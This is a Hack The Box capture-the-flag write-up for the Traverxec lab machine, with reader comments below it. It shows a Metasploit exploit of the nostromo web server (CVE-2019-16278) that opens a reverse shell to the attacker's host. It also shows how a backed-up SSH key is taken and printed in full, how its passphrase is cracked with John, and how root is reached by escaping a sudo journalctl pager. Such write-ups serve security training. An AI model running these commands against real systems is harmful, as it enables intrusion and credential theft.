Hack The Box Traverxec Full Writeup – 10.10.10.165

So, I spawned the Traverxec a while ago. This Linux machine actually says an easy one.

I’m preparing a full writeup on this machine, planing to publish by couple of days – stay tuned until then.

The initial foothold and user was too easy!. If you remember a recent CVE (CVE-2019-16278) and the MS exploit for it will give you immediate shell. Once you are in, a light enumeration gives you user.txt

So here are the steps I followed:

User.txt

Hack The Box Traverxec Notes Writeup – 10.10.10.165. The initial foothold and user was too easy!. If you remember a recent CVE…

Update your msf and get the latest exploits and follow the steps below:

⚡  root@ns09  ~/htb/traverxec  msfconsole
[-] ***rting The Metasploit Framework console.../
[-] * WARNING: No database support: could not connect to server: Connection refused
	Is the server running on host "localhost" (127.0.0.1) and accepting
	TCP/IP connections on port 5432?

[-] ***
                                                  
               .;lxO0KXXXK0Oxl:.
           ,o0WMMMMMMMMMMMMMMMMMMKd,
        'xNMMMMMMMMMMMMMMMMMMMMMMMMMWx,
      :KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMK:
    .KMMMMMMMMMMMMMMMWNNNWMMMMMMMMMMMMMMMX,
   lWMMMMMMMMMMMXd:..     ..;dKMMMMMMMMMMMMo
  xMMMMMMMMMMWd.               .oNMMMMMMMMMMk
 oMMMMMMMMMMx.                    dMMMMMMMMMMx
.WMMMMMMMMM:                       :MMMMMMMMMM,
xMMMMMMMMMo                         lMMMMMMMMMO
NMMMMMMMMW                    ,cccccoMMMMMMMMMWlccccc;
MMMMMMMMMX                     ;KMMMMMMMMMMMMMMMMMMX:
NMMMMMMMMW.                      ;KMMMMMMMMMMMMMMX:
xMMMMMMMMMd                        ,0MMMMMMMMMMK;
.WMMMMMMMMMc                         'OMMMMMM0,
 lMMMMMMMMMMk.                         .kMMO'
  dMMMMMMMMMMWd'                         ..
   cWMMMMMMMMMMMNxc'.                ##########
    .0MMMMMMMMMMMMMMMMWc            #+#    #+#
      ;0MMMMMMMMMMMMMMMo.          +:+
        .dNMMMMMMMMMMMMo          +#++:++#+
           'oOWMMMMMMMMo                +:+
               .,cdkO0K;        :+:    :+:                                
                                :::::::+:
                      Metasploit

       =[ metasploit v5.0.60-dev                          ]
+ -- --=[ 1947 exploits - 1090 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nostromo

Matching Modules
================

   #  Name                                   Disclosure Date  Rank  Check  Description
   -  ----                                   ---------------  ----  -----  -----------
   0  exploit/multi/http/nostromo_code_exec  2019-10-20       good  Yes    Nostromo Directory Traversal Remote Command Execution


msf5 > use exploit/multi/http/nostromo_code_exec
msf5 exploit(multi/http/nostromo_code_exec) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf5 exploit(multi/http/nostromo_code_exec) > set RHOST 10.10.10.165
RHOST => 10.10.10.165
msf5 exploit(multi/http/nostromo_code_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.9:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.10.14.9:4444 -> 10.10.10.165:49876) at 2019-11-19 10:43:08 +0300
shell

[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
ls

Now I have the shell, I’m going to the home directory of user David and get his ssh backup to a .tmp directory I made using below commands.

$ ls /home/david/public_www/
ls /home/david/public_www/
index.html  protected-file-area
$ ls /home/david/public_www/protected-file-area
ls /home/david/public_www/protected-file-area
backup-ssh-identity-files.tgz
$ mkdir /tmp/.nav1n
mkdir /tmp/.nav1n
$ cd /tmp/.nav1n           
cd /tmp/.nav1n
$ cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz .
cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz .
$ tar -zxvf backup-ssh-identity-files.tgz
tar -zxvf backup-ssh-identity-files.tgz
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
$ cat home/david//ssh/id_rsa
cat home/david//ssh/id_rsa
cat: home/david//ssh/id_rsa: No such file or directory
$ cat home/david/.ssh/id_rsa
cat home/david/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F

seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
tuiBPfZy+ZPklLkOneIggoruLkVGW4k4651pwekZnjsT8IMM3jndLNSRkjxCTX3W
KzW9VFPujSQZnHM9Jho6J8O8LTzl+s6GjPpFxjo2Ar2nPwjofdQejPBeO7kXwDFU
RJUpcsAtpHAbXaJI9LFyX8IhQ8frTOOLuBMmuSEwhz9KVjw2kiLBLyKS+sUT9/V7
HHVHW47Y/EVFgrEXKu0OP8rFtYULQ+7k7nfb7fHIgKJ/6QYZe69r0AXEOtv44zIc
Y1OMGryQp5CVztcCHLyS/9GsRB0d0TtlqY2LXk+1nuYPyyZJhyngE7bP9jsp+hec
dTRqVqTnP7zI8GyKTV+KNgA0m7UWQNS+JgqvSQ9YDjZIwFlA8jxJP9HsuWWXT0ZN
6pmYZc/rNkCEl2l/oJbaJB3jP/1GWzo/q5JXA6jjyrd9xZDN5bX2E2gzdcCPd5qO
xwzna6js2kMdCxIRNVErnvSGBIBS0s/OnXpHnJTjMrkqgrPWCeLAf0xEPTgktqi1
Q2IMJqhW9LkUs48s+z72eAhl8naEfgn+fbQm5MMZ/x6BCuxSNWAFqnuj4RALjdn6
i27gesRkxxnSMZ5DmQXMrrIBuuLJ6gHgjruaCpdh5HuEHEfUFqnbJobJA3Nev54T
fzeAtR8rVJHlCuo5jmu6hitqGsjyHFJ/hSFYtbO5CmZR0hMWl1zVQ3CbNhjeIwFA
bzgSzzJdKYbGD9tyfK3z3RckVhgVDgEMFRB5HqC+yHDyRb+U5ka3LclgT1rO+2so
uDi6fXyvABX+e4E4lwJZoBtHk/NqMvDTeb9tdNOkVbTdFc2kWtz98VF9yoN82u8I
Ak/KOnp7lzHnR07dvdD61RzHkm37rvTYrUexaHJ458dHT36rfUxafe81v6l6RM8s
9CBrEp+LKAA2JrK5P20BrqFuPfWXvFtROLYepG9eHNFeN4uMsuT/55lbfn5S41/U
rGw0txYInVmeLR0RJO37b3/haSIrycak8LZzFSPUNuwqFcbxR8QJFqqLxhaMztua
4mOqrAeGFPP8DSgY3TCloRM0Hi/MzHPUIctxHV2RbYO/6TDHfz+Z26ntXPzuAgRU
/8Gzgw56EyHDaTgNtqYadXruYJ1iNDyArEAu+KvVZhYlYjhSLFfo2yRdOuGBm9AX
JPNeaxw0DX8UwGbAQyU0k49ePBFeEgQh9NEcYegCoHluaqpafxYx2c5MpY1nRg8+
XBzbLF9pcMxZiAWrs4bWUqAodXfEU6FZv7dsatTa9lwH04aj/5qxEbJuwuAuW5Lh
hORAZvbHuIxCzneqqRjS4tNRm0kF9uI5WkfK1eLMO3gXtVffO6vDD3mcTNL1pQuf
SP0GqvQ1diBixPMx+YkiimRggUwcGnd3lRBBQ2MNwWt59Rri3Z4Ai0pfb1K7TvOM
j1aQ4bQmVX8uBoqbPvW0/oQjkbCvfR4Xv6Q+cba/FnGNZxhHR8jcH80VaNS469tt
VeYniFU/TGnRKDYLQH2x0ni1tBf0wKOLERY0CbGDcquzRoWjAmTN/PV2VbEKKD/w
-----END RSA PRIVATE KEY-----
$ 

I copied the RSA private key to my Kali and cracked it using John.

⚡ ⚙  root@ns09~/htb/traverxec ls
exploit.sh  id_rsa  id_rsa.hash  ssh2john.py
⚡ ⚙  root@ns09~/htb/traverxec python ssh2john.py id_rsa > id_rsa.hash

The John cracked the password as “hunter”

 ⚡ ⚙  root@ns09 ~/htb/traverxec john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
1g 0:00:00:14 DONE (2019-11-19 10:58) 0.07007g/s 1005Kp/s 1005Kc/s 1005KC/sa6_123..*7¡Vamos!
Session completed

Getting user.txt

Once I have the keyphrase, I ssh the box using the following command:

⚡ ⚙ root@ns09~/htb/traverxec ssh david@traverxec.htb -i id_rsa
Enter passphrase for key 'id_rsa': "hunter"
 ⚡ root@ns09~/htb/traverxec ssh david@10.10.10.165 -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Tue Nov 19 03:51:04 2019 from 10.10.14.9
david@traverxec:~$ ls
bin  journalctl  priv  public_www  user.txt
david@traverxec:~$ ct user.txt
-bash: ct: command not found
david@traverxec:~$ cat user.txt
7db0b[------------]82f3d
david@traverxec:~$ 

Privesc and Getting root.txt

The user David’s bin has a bash file called “server-stats.sh” this is to collect the log stats from the Server, I will use it to run David as root user.

david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head  server-stats.sh
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 
david@traverxec:~/bin$ 

After reading the server-stats.sh, I understood how to run it 🙂

Now, I resized the terminal to smallest as possible (this will execute the linux pager – or you can use the command “less”)

and typed !/bin/sh boom – I’m root

david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-11-18 21:44:
Nov 18 22:30:48 traverxec sudo[1180]: 
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:52 traverxec crontab[1269
!/bin
/bin/bash: /bin: Is a directory
!done  (press RETURN)
...skipping...
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:50 traverxec sudo[1180]: 
Nov 18 22:30:52 traverxec crontab[1269
!/bin/sh
# ls
bin	    priv	user.txt
journalctl  public_www
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
nostromo_1.9.6-1.deb  root.txt
# cat root.txt
9aa36[--------------]6e0d906
# 

Thanks for reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug-bounty. If you are an HTB user and like my articles, please respect here: Profile: https://www.hackthebox.eu/nav1n

You may also like...

Subscribe
Notify of
guest
3 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Andy Alfa
Andy Alfa
9 months ago

Hi, There are few improvements I can see you can do to make your write up more friendly: 1) How did you find out a vulnerability to use? 2) There is no explanation on how did you get SSH key directory. /home/david/ is not browsable (permissions denied) so you need to find internal browsable directory in another way. 3) “After reading the server-stats.sh, I understood how to run it 🙂” – what does this mean? There is no explanation. There is no reference to GTFOBins (or any other trick). Write ups and challenges are used for education. So the person… Read more »

Anton Oleynik
Anton Oleynik
6 months ago

1. In docs for nostromo we can saw how structure work. In config for nostromo we saw that home directory for pages it’s home then it’s work for every user, ””homedirs /home
homedirs_public public_www””
2. Just make listing /home/david/public_www give us listing of folder.
2.1 I go another way, I break hash from .htpasswd and didn’t know where use this password, and after found in ls “protected-file-area”
this page, got login system
3. https://gtfobins.github.io/gtfobins/journalctl/

Sorry, that action is blocked.